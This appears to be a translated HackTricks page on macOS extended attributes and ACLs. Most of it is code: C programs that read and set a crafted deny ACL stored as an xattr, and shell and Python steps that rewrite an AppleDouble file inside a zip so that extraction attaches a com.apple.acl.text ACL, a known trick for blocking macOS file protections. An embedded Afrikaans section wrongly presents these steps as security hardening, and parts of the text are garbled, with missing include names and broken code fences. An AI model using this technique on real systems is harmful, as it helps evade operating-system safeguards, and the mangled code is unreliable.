macOS xattr-acls extra stuff
Last updated
Last updated
Leer & oefen AWS Hacking:HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)
Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
rm -rf /tmp/test*
echo test >/tmp/test
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
./get_acls test
ACL for test:
!#acl 1
group:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:deny:write,writeattr,writeextattr,writesecurity,chown
ACL in hex: \x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a```c // gcc -o get_acls get_acls #include #include #include
int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "Usage: %s \n", argv[0]); return 1; }
const char *filepath = argv[1]; acl_t acl = acl_get_file(filepath, ACL_TYPE_EXTENDED); if (acl == NULL) { perror("acl_get_file"); return 1; }
char *acl_text = acl_to_text(acl, NULL); if (acl_text == NULL) { perror("acl_to_text"); acl_free(acl); return 1; }
printf("ACL for %s:\n%s\n", filepath, acl_text);
// Convert acl_text to hexadecimal and print it printf("ACL in hex: "); for (char *c = acl_text; *c != '\0'; c++) { printf("\x%02x", (unsigned char)*c); } printf("\n");
acl_free(acl); acl_free(acl_text); return 0; }
```markdown
<details>
<summary>MacOS XATTR, ACLs en ekstra goed</summary>
In MacOS is daar verskeie maniere om lêers en gidsen te beveilig deur gebruik te maak van Extended Attributes (XATTR) en Access Control Lists (ACLs). Hierdie tegnieke kan help om die sekuriteit van jou stelsels te verbeter en om ongewenste toegang te voorkom.
### Extended Attributes (XATTR)
XATTR is 'n manier om ekstra metadata aan lêers en gidsen toe te voeg. Dit kan gebruik word om spesifieke inligting oor 'n lêer te stoor, soos wie dit geskep het of wanneer dit laas gewysig is. Dit kan ook gebruik word om sekuriteitsmaatreëls toe te pas.
### Access Control Lists (ACLs)
ACLs bied 'n meer gedetailleerde benadering tot toegangsbeheer as tradisionele Unix-permissies. Met ACLs kan jy spesifieke toegangsregte aan verskillende gebruikers of groepe toeken. Dit maak dit moontlik om 'n meer fynbeheer oor wie toegang het tot wat op jou stelsel.
### Gebruik van XATTR en ACLs
Om XATTR en ACLs te gebruik, kan jy die volgende opdragte in die terminale uitvoer:
- Om 'n XATTR by 'n lêer toe te voeg:
```bash
xattr -w myAttribute myValue myFileOm 'n ACL by 'n lêer toe te voeg:
chmod +a "user:username allow read,write" myFileDeur hierdie tegnieke te gebruik, kan jy jou MacOS-stelsel se sekuriteit verbeter en die risiko van ongewenste toegang verminder.
``` ```bash # Lets add the xattr com.apple.xxx.xxxx with the acls mkdir start mkdir start/protected ./set_xattr start/protected echo something > start/protected/something ```
```c // gcc -o set_xattr set_xattr.c #include #include #include #include #include
void print_xattrs(const char *filepath) { ssize_t buflen = listxattr(filepath, NULL, 0, XATTR_NOFOLLOW); if (buflen < 0) { perror("listxattr"); return; }
char *buf = malloc(buflen); if (buf == NULL) { perror("malloc"); return; }
buflen = listxattr(filepath, buf, buflen, XATTR_NOFOLLOW); if (buflen < 0) { perror("listxattr"); free(buf); return; }
printf("All current extended attributes for %s:\n", filepath); for (char *name = buf; name < buf + buflen; name += strlen(name) + 1) { printf("%s: ", name); ssize_t valuelen = getxattr(filepath, name, NULL, 0, 0, XATTR_NOFOLLOW); if (valuelen < 0) { perror("getxattr"); continue; }
char *value = malloc(valuelen + 1); if (value == NULL) { perror("malloc"); continue; }
valuelen = getxattr(filepath, name, value, valuelen, 0, XATTR_NOFOLLOW); if (valuelen < 0) { perror("getxattr"); free(value); continue; }
value[valuelen] = '\0'; // Null-terminate the value printf("%s\n", value); free(value); }
free(buf); }
int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "Usage: %s \n", argv[0]); return 1; }
const char *hex = "\x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a"; const char *filepath = argv[1];
int result = setxattr(filepath, "com.apple.xxx.xxxx", hex, strlen(hex), 0, 0); if (result == 0) { printf("Extended attribute set successfully.\n\n"); } else { perror("setxattr"); return 1; }
print_xattrs(filepath);
return 0; }
</details>
<div data-gb-custom-block data-tag="code" data-overflow='wrap'>
```bash
# Create appledoublefile with the xattr entitlement
ditto -c -k start protected.zip
rm -rf start
# extract the files
unzip protected.zip
# Replace the name of the xattr here (if you put it before ditto would have destroyed it)
python3 -c "with open('._protected', 'rb+') as f: content = f.read().replace(b'com.apple.xxx.xxxx', b'com.apple.acl.text'); f.seek(0); f.write(content); f.truncate()"
# zip everything back together
rm -rf protected.zip
zip -r protected.zip protected ._protected
rm -rf protected
rm ._*# Check if it worked
ditto -x -k --rsrc protected.zip .
xattr -l protectedLeer & oefen AWS Hacking:HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)
